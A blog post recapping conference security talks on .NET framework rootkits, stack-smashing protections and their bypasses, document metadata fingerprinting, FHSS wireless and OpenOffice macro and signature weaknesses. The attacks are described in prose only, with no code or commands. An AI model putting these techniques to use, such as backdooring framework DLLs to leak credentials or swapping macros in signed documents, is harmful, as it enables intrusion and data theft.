After a hectic day 1, we roll into the 2nd way with some good talks. It’s just a pity that the conference is only 2 days.
.NET Framework Rootkits
Erez Metula took some time to explain the basics of post exploitation against frameworks. I’d already had the pleasure to read his article in the latest HAKIN9 magazine, so the basics were fresh in my mind. Although .NET was the chosen victim of the presentation, Erez went out of his way to ensure everybody knew that this attack vector was easily ported to other languages such as Java, PHP, and the Google Android engine. By exploiting a failure in .NET’s file validation, it was possible to directly insert compile .NET commands into an existing DLL. In effect, this allowed Erez to change common functions, such as authentication functions, to support magic codes (i.e. if the username is “GOD” let him in), as well as inserting backdoor listeners, duplicating logon processes (to send a username:password to the attacker as well) and even compromise cryptographic functions (through key fixation, or downgrading). .Net was chosen as the target for the talk as it is so common among Windows systems (installed as default on Win2K3 and above) as well as having support now on other platforms thanks to the MONO project. The process of altering the DLL and replacing it can be automated using tools Erez is due to make public at his website (http://www.applicationsecurity.co.il/.Net-Framework-Rootkits.aspx). The .Net-Sploit tool includes a number of pre-compiled modules, but is designed to be more of a Metasploit type project, where the software acts as a framework for future code and attack vectors. I suggest you checkout the slides from his website (or the Blackhat website) and download the tool to have a play about.
Microsoft were advised of the issues found that enabled DLL’s too be replaced without checking the signatures. However due to the POST-Exploitation style of attack, declined to fix the issue. Some of the Microsoft representatives on-site seemed interested in the issue however, so there may be some movement on this in the near future. Keep you eyes open for a patch.
Due to time constraints the JAVA demo at the end of the talk was cut a little short. However a brief demo of the same attack vector against the JAVA framework was completed just as easily as the previous .NET demos. This attack vector is something I think we’ll be seeing more of in the future. Getting access to a server isn’t always the challenge, it’s getting ongoing access to the data on that serve as it continues to process client requests (i.e. credit card details). With a quick change to the .NET functions that deal with the credit card transactions themselves, it’s easy to duplicate the sending of data to a second off-site (attacker owned) system. Although there is a chance that these communications would trigger IDS alerts (the demos used clear text HTTP for communications), attackers are likely to go to better lengths to disguise the traffic as legitimate HTTPS communications. Code reviews, which are designed to find this kind of issue) are unlikely to discover the issue, as the source-code used for the application has not been changed. By directly inserting the malicious code into the compiled DLL, only reverse engineering of the infected DLL would show the malicious functions.
This is something I’ll be trying to work into our penetration testing arrangements in the near future. It’s eye opening and a great source of client information.
Stack Smashing as of today
I managed to stick my head in to see Hagen Fritsch talk about stack smashing on 64bit Linux systems. I wished I’d managed to make it for the start of the talk as I never like to join a show in progress. Even less so when it’s such a good (and technical) presentation. I’m not a specialist when it comes to things like ASLR and NX bypass, but the information was really well presented. I’m going to have to go back over the slides and really go indepth on some of the points made.
From what I did catch however, Hagen discussed commonly used methods under Linux to prevent buffer overflow attacks. The usual suspects, Stack Cookies, Non-eXecutable stack and Address Space Layout Randomisation. Bypass methods of a sort exist for all these protections, however by combining them it makes it very hard to successfully overflow and run malicious code.
Some key points. SSP (Stack Smashing Protection) is only implemented under Linux on char[] buffers over 4 bytes. This means that smaller buffers can still be vulnerable. Stack cookies are default now on most major compilers (Visual Studio, gcc, etc..) Attack demos on guessing the timestamp used to form the canary and brute-forcing the 16bit random section of ASLR were made to show that the theory was sound. As I said, I wish I’d made it to the whole talk, and will definitely have to watch the video when it’s available.
Tactical Fingerprinting Using Metadata: Hidden Info and Lost Data
Metadata has been a topic on the rise for a while now. There have been lots of articles discussing the uses and protections. I’ve even given a presentation and written a short (as yet unpublished) peice on Metadata. Still, it’s always nice to be reminded how useful this information can be in a client-side attack. To drive the message home some simple google filetype searches and some examples (using bintext to extract the strings from files) were made. The usual information was extracted, username, software versions and some printer information and paths. Apart from the usual Microsoft Office or PDF targets, the speakers also covered a short extract of ODF and graphics files. Extraction of document revision history and other metadata was briefly touched on with libextractor, or Metagoofil. No mention of the revisionist tool for pulling out previous revisions, however the details seem to be in the tool. This is nothing new really. What may be of interest however is the tool released as part of this talk. Existing tools on support the extraction of Metadata, and not recovery of lost Data, or Hidden Information. The FOCA tool supports a range of formats and allows you to read the metadata from multiple files (including a nifty feature to export the metadata from images stored inside a PowerPoint presentation, or other document). The demo was pretty impressive. Although the information can probably be extracted in a number of different ways (strings, hex editing etc), the FOCA (Fingerprinting and Organisation with Collected Archives) tool brings it all together into one easy tool. Support for batch processing is something that will come in very handy for penetration testers looking at large datasets. As well as offering the chance to read each documents metadata, the FOCA tool also pulls the relevant usernames, paths (folders), software versions, printer details, and email addresses into easy to an easy to read location. With direct support for Google or Live Search within the tool, you can easily analyse sites for metadata without having to download the files separately. The ability for the tool to group information into useful and readable groups is amazing. By analysing all the data from a sample domain it was possible to list 150 workstations with names and the valid users and paths on the machine. For a client-side attack this application is invaluable. I’ll be playing with this later.
FOCA version 0.7.6.4 is available from http://www.informatica64.com/FOCA
For those wanting an easier option, the developers provide an online version at same address.
A Proof of Concept (Spanish only) tool called oometastractor was demonstrated that shows that the open Office metadata cleaner doesn’t completely remove all data from the document. Hopefully this will be translated into English for you’re usage pleasure.
I managed to catchup with Chema Alonso and Enrique Rando for a short chat after the talk. They’re looking to expand on the tool and incorporate support for new formats. One limit of the tool currently is directly getting metadata from image files. Although this can be done for images embedded into other documents, it seem direct support isn’t yet implemented. They encourage people to give feedback on what people want to see supported. So get your requests in now. I’ve already asked for Adobe Photoshop and InDesign support. What metadata do you want to read today ?
Yes it is too wifi, and no it’s not inherently secure
I wasn’t sure what to expect from this talk, but had a quick chat to the Spiderlabs/Trustwave crew prior to the talk. Some of the stuff they’re doing in reference to virtual teaming really interests me personally and professionally, so I hope to keep in touch with them in the future.
Rob Havelt’s talk focused on 802.11 FHSS (Frequency Hoping Spread Spectrum) a pre-cursor to 802.11 a/b/g/n. The original standard was created by ANSI/IEEE back in 1997 and revised in 1999. Although the limits of the technology restrict communications to 2Mbit/s it is still in active use for bar-code scanners and warehouse systems across the world. Security implementations were based on a secret SSID, MAC filtering (impossible to bypass of course) and the ever faithful 40bit WEP Encryption. As most people who know wifi will be thinking, these aren’t much of a security system. Then again the FHSS was originally created back in World Warr II, so it’s showing it’s age just a little.
Layer 1 works very much like Bluetooth, using a frequency hop about once ever 400 milliseconds. The channels (79 in total) run on the 2.4Ghz range and hop between frequencies in a one of 78 patterns as specified by the standard. Above layer 1, everything works exactly like 802.11a/b/g/n making the process so much easier. After all, all security people are lazy, and we like to re-use existing code or research.
In order to capture the SSID required to connect to the network, a USRP with GNURadio is used to listen on a single channel. Once the FHSS network shifts to this channel the SSID should be visible in the Management Packets just like other 802.11 wireless networks. With this SSID it is possible to join the network using a specific FHSS network card (the one used in the demo was a Spectrum24 by Symbol). At this point the MAC address filtering and WEP 40 bit Encryption need to be addresses. This wasn’t covered in the talk directly as WEP protection has already been done to death.
Rob explained that this kind of wireless was still found quite often during penetration tests, and is normally left unencrypted and unrestricted using a simple bridge to the internal network. I can image that due to the age of the protocol and hardware used, that software was not even on the horizon at the time. Some of the companies using this kind of wireless are under the impression that it is not exploitable due to specific hardware requirements, and the initial SSID requirement.
I’d love to grab one of these cards and do some playing around in this area. It goes quite well with the DECT interception I’m currently looking at, and I enjoy the myth busting of these older “security through obscurity” products and protocols. I guess I’ll have to grab a USRP2 at somepoint to continue this research.
OpenOffice Security Design Weaknesses
I managed to talk a little to Eric Filiol and Jean-Paul Fizaine in the morning before the double long talk. The topic sounded very interesting and to my surprise was based on the latest version 3 of OOo, as well as the earlier versions. It’s always nice to see complete research that looks at several versions of the product instead of just focusing on one version. The research for this talk began back in 2006 with version 2, and was then compared to the newer version 3 to examine what security changes had been made. It seems that many of the design based security issues originally discovered in version 2, were recreated in version 3.
Due to the increased use of OpenOffice throughout Europe, there were a growing number of questions surrounding the security of the product. An analysis in 2006/2007 showed that ver. 2.x was very insecure. These findings were handed to the Open Office team. Leap forward to 2008, and the version 3 of Open Office is released. Despite the fact it was hailed as a major evolution, the same problems found in 2006 still existed.
OpenOffice2
OpenOffice Malware appeared in the wild in 2007 (BadBunny). Since then, there has been nothing major for the product. However the risk is still very high, as the security design issues remain. These security issues stem from the support of OOBasic, Python, Perl, Javascript, Ruby… to be directly included in the document. BadBunny used multiple scripting languages to exploit Windows (Javascript), Linux (Perl) and OSX (Ruby) systems. By incorporating this issue with the design of the macro security model, it is possible to exploit OpenOffice users on all platforms. These are only a couple of flaws mentioned.
OpenOffice3
Fixed a few security issues, added Vista support. As the new OpenOffice 3 document format was a basic zip format (rename to zip and extract) it was possible to directly extract, and change the document contents. This is similar in design to Microsoft Office 2007 format XML files. Some security settings are stored in the XML data (manifest.xml) in clear text. By changing these it is possible to simply bypass certain security restrictions on a file (i.e password protection). Encryption of files is done using Blowfish in CFB mode, and SHA-1 for hashing. This encryption is better than the comparable MS Office encryption. However Open Office doesn’t encrypt the manifest.xml file. After signing a document a documentsignature.xml is created. Neither documentsignature.xml or manifest.xml are signed or encrypted at any point. This allows an attacker to tamper with them.
Even if a document is encrypted it is possible to delete an existing macro and replace it with a malicious version. The end-user will not receive any alerts to this change. If a document is signed, this attack vector is no longer possible.
As the security issues are built into the design, fixing the issues is not an easy and simple process. Removing the support for so many macro scripting languages may be a start in this area. Encryption and signing need to be looked at again with a more security focus in mind.
The technical information presented in the talk is available in a white-paper to be released on the Blackhat website.
In the second session of the talk we go to see the demos of the attacks in action. The uncompressed OpenOffice documents are very easy to deal with as long as you understand XML. Very similar to the MS Office 2007 file layouts. Time to learn XML people.
The demos showed that it’s childsplay to replace a macro in an encrypted document with a new (unencrypted) macro. By removing the encryption section of the manifest.xml for the macro and associated files you can fool Open Office into thinking everything is normal, “these are not the macros that you’re looking for”. Even password protection of the document doesn’t effect this attack vector. The last demo showed a man-in-the-middle attack on a signed OpenOffice document. By getting the signed document in transit (take your pick of attack vectors here) he can extract information on who owns the certificate and then forge a replacement certificate (using openssl to export to pkcs12 format). This is then imported into the certificate store (using Firefox in this case) to allow OpenOffice to use the certificate. The attacker can then sign a new message. This attacks falls down on a number of levels. If the person sending is using a non-self-signed certificate, then the certificate chain will be different. However, how many users really check the whole chain. At first glance, the certificate looks the same, although it’s self-signed. Still, this is a flaw with all self signed certificates. They can be exploited in many ways, for many different purposes.
and that’s a wrap
Well it’s been a busy few days. I’d like to thanks Didier Stevens for hooking me up for a press registration, and Blackhat for letting me attend at such late notice (you wouldn’t believe how late). This was a unique conference for me, and I really hope to attend the Blackhat conference in the US, or next year in Barcellona. Hope to see you all there.
Like this:
Like Loading...
Related
nice recap Chris!
looking forward to them posting those slides. looks like it was a good lineup of people.